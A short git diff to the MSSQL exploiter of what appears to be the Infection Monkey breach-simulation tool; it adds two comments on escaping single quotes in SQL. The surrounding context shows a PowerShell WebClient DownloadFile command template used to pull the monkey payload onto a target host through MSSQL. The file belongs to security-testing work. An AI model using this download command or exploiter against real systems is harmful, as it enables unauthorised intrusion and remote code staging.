diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 7495b38d7..7dbb190a1 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -31,6 +31,8 @@ class MSSQLExploiter(HostExploiter):
     TMP_FILE_NAME = "tmp_monkey.bat"
     TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
 
+    # Single quotes are escaped in SQL by using two of them.
+    # Example: 'It ain''t over ''til it''s over'
     MONKEY_DOWNLOAD_COMMAND = (
         "powershell (new-object System.Net.WebClient)."
         "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"